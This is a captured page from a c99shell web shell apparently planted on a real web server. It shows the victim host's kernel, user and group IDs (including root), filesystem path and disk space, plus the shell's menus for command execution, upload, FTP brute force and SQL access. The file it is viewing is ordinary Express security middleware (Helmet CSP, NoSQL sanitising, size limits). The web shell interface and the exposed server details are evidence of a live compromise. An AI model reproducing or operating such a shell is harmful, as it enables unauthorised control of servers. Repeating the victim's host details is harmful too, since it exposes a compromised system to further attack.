smm.picotech.app - c99shell

!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!
Software: Apache. PHP/8.1.30 uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC 2025 x86_64 uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root) Safe-mode: OFF (not secure) /home/picotech/domains/rentals.picotech.app/public_html/server/middleware/ drwxr-xr-x Free 23.55 GB of 117.98 GB (19.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Self remove Logout

!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)

Safe-mode: OFF (not secure)

/home/picotech/domains/rentals.picotech.app/public_html/server/middleware/ drwxr-xr-x
Free 23.55 GB of 117.98 GB (19.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Self remove Logout

Viewing file: security.js (2.27 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

import helmet from 'helmet';
import mongoSanitize from 'express-mongo-sanitize';
import crypto from 'crypto';

// Generate nonce for CSP
export const generateNonce = () => {
    return crypto.randomBytes(16).toString('base64');
};

// Configure Helmet for security headers with strict CSP
export const securityHeaders = helmet({
    contentSecurityPolicy: {
        directives: {
            defaultSrc: ["'self'"],
            scriptSrc: ["'self'"], // No unsafe-inline, no unsafe-eval
            styleSrc: ["'self'", "'unsafe-inline'"], // Allow inline styles for now
            imgSrc: ["'self'", 'data:', 'https:', 'blob:'],
            connectSrc: ["'self'"],
            fontSrc: ["'self'", 'data:'],
            objectSrc: ["'none'"],
            mediaSrc: ["'self'"],
            frameSrc: ["'none'"],
            baseUri: ["'self'"],
            formAction: ["'self'"],
            frameAncestors: ["'none'"],
            upgradeInsecureRequests: [],
        },
    },
    crossOriginEmbedderPolicy: false,
    crossOriginResourcePolicy: { policy: 'cross-origin' },
    hsts: {
        maxAge: 31536000, // 1 year
        includeSubDomains: true,
        preload: true
    },
});

// Sanitize request data to prevent NoSQL injection
export const sanitizeRequest = (req, res, next) => {
    // Sanitize req.body, req.query, and req.params
    mongoSanitize.sanitize(req.body);
    mongoSanitize.sanitize(req.query);
    mongoSanitize.sanitize(req.params);
    next();
};

// Additional XSS protection middleware
export const xssProtection = (req, res, next) => {
    // Set additional security headers
    res.setHeader('X-Content-Type-Options', 'nosniff');
    res.setHeader('X-Frame-Options', 'DENY');
    res.setHeader('X-XSS-Protection', '1; mode=block');
    res.setHeader('Referrer-Policy', 'strict-origin-when-cross-origin');

    // Remove X-Powered-By header
    res.removeHeader('X-Powered-By');

    next();
};

// Request size limiter
export const requestSizeLimiter = (req, res, next) => {
    const contentLength = parseInt(req.headers['content-length'] || '0');
    const maxSize = 100 * 1024 * 1024; // 100MB

    if (contentLength > maxSize) {
        return res.status(413).json({
            message: 'Request entity too large',
            maxSize: '100MB'
        });
    }

    next();
};

:: Command execute ::
Enter:	Select:

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.053 ]--